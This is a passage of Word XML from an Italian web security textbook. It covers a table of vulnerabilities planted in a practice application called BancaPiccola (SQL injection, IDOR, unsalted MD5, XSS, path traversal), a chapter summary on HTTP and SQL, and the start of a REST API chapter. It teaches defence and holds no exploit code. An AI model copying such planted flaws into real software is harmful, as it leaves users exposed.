              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/cerca</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injection (UNION-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_5" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 5</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/fattura/&lt;id&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_6" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 6</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/profilo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password MD5 senza salt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 7</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/cerca</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(output)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reflected XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/commenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dipendenze con CVE noti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 9</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/download?file=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path Traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_10" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 10</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Otto capitoli, otto vulnerabilità reali, una sola applicazione in cui esercitarti. Quando arriverai al </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> saprai trovare e correggere tutti questi bug a occhi chiusi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:bookmarkEnd w:id="144"/>
    <w:bookmarkStart w:id="145" w:name="riepilogo-del-capitolo-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="sec_3_16"/>
      <w:r>
        <w:t xml:space="preserve">3.16 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’applicazione web è composta da un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(browser) e un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(programma) che dialogano tramite il protocollo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">richieste HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hanno un metodo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una URL, header e un body opzionale. Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">risposte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hanno uno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">status code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(200, 404, 500…), header e un body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">stateless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ricorda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gli utenti attraverso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sessioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lato server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è HTTP con cifratura TLS: obbligatorio in produzione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">database relazionali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">organizzano i dati in tabelle. Si interrogano con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</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p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python si collega ai database via librerie come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le query devono sempre usare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">come placeholder, mai concatenare stringhe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">framework web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come Flask fornisce routing, gestione richieste/risposte, template HTML e sessioni, evitando di riscrivere ogni volta lo stesso codice di base.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le librerie esterne si gestiscono con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e si dichiarano in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai costruito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MiniBlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, una piccola applicazione che mette insieme tutti questi pezzi. La useremo come riferimento concettuale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in poi useremo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, l’applicazione vulnerabile di esercitazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A questo punto hai tutto il modello mentale necessario per affrontare la parte di sicurezza vera e propria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10: la lista degli errori più comuni.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vediamo qual è la classifica mondiale delle vulnerabilità più diffuse, chi la mantiene, e perché è il riferimento di fatto per chiunque lavori in sicurezza applicativa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="145"/>
    <w:bookmarkEnd w:id="146"/>
    <w:bookmarkStart w:id="177" w:name="capitolo-3-bis-rest-e-api-rest"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="484" w:name="ch_3"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 3-bis — REST e API REST</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (anatomia di un’app web) e l’esercitazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MiniBlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che hai costruito alla </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_3_14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 3.14</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">90-120 minuti se segui anche l’esercitazione. Stesso registro del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">: dense con esempi, ma adesso applichiamo le idee.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> abbiamo costruito un’applicazione web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tradizionale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il browser chiede una pagina, il server risponde con HTML che contiene già il contenuto da mostrare. Va benissimo per molti scopi. Ma c’è un’altra modalità — sempre più importante — in cui il server non risponde con HTML ma con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dati grezzi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, lasciando al cliente (un’app per smartphone, un altro programma server, una pagina JavaScript) il compito di decidere cosa farne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa modalità si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando le API seguono un certo stile chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, si parla di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sono ovunque: ogni app del tuo telefono che parla con internet, ogni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Login con Google</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su un sito, ogni transazione di pagamento, ogni dato meteo che vedi sul telefono — tutto passa da API REST. Capirle è un prerequisito non negoziabile per chiunque lavori in sviluppo web oggi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E per noi, come futuri sviluppatori consapevoli della sicurezza, c’è una ragione in più:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">le API REST sono oggi il vettore di attacco più sfruttato del web moderno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Studi recenti delle aziende di sicurezza riportano che oltre il 60% degli incidenti di sicurezza applicativa coinvolgono API. Lavoriamoci sopra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="148" w:name="b.1-cosè-una-api-e-cosa-non-è"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.1 Cos’è una API (e cosa non è)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sta per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Application Programming Interface</w:t>
      </w:r>
